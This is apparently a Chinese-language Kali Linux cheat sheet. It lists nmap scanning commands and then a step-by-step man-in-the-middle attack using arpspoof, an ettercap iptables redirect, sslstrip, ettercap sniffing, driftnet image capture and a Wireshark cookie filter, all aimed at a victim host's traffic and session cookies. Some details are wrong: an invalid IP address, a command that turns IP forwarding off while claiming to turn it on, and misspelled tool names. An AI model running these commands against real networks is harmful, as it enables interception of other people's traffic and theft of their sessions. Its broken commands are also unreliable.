root@kali:~# ping 115.26.47.2457(虚构IP)
扫描主机是否存活:
root@kali:~# nmap -sn 115.26.47.245
root@kali:~# nmap -v -A 115.26.47.245
root@kali:~# nmap -T4 -v -A 115.26.47.245
探测版本:
root@kali:~# nmap -sV 115.26.47.245
root@kali:~# nmap -O 115.26.47.245
探测端口:
root@kali:~# nmap -Pn 115.26.47.245
root@kali:~# nmap -PO 115.26.47.245
root@kali:~# nmap -p 80-445 115.26.47.245
扫描C段:
root@kali:~# nmap -sP 115.26.0.1/24
扫描子网掩码:
root@kali:~# nmap -sP 115.26.47.245-255
MAC地址扫描:
root@kali:~# nmap -sn -PR 115.26.47.245
全局扫描:
root@kali:~# nmap -A 115.26.47.245
root@kali:~# arpspoof
开启IP路由转发:
root@kali:~# echo 0 >/proc/sys/net/ipv4/ip_forward
root@kali:~# arpspoof -i wlan0 -t 192.168.0.104 115.26.47.245
修改Https协议属性降权文件:
root@kali:~# vim /etc/ettercap/etter.conf
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
去掉#哈希标识:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
注:Vim热键指南:i键插入内容,ESC键退出编辑,"wq" 保存并退出,Shift+zz键返回当前终端桌面!
sroot@kali:~# slstrip -a -f -k
root@kali:~# ettercap
root@kali:~# ettercap -Tq -i wlan0
root@kali:~# driftnet -i wlan0
root@kali:~# driftnet -i wlan0 -a -d /home/XXX/Desktop/
root@kali:~# wireshark
注:过滤器:http==cookies
网友评论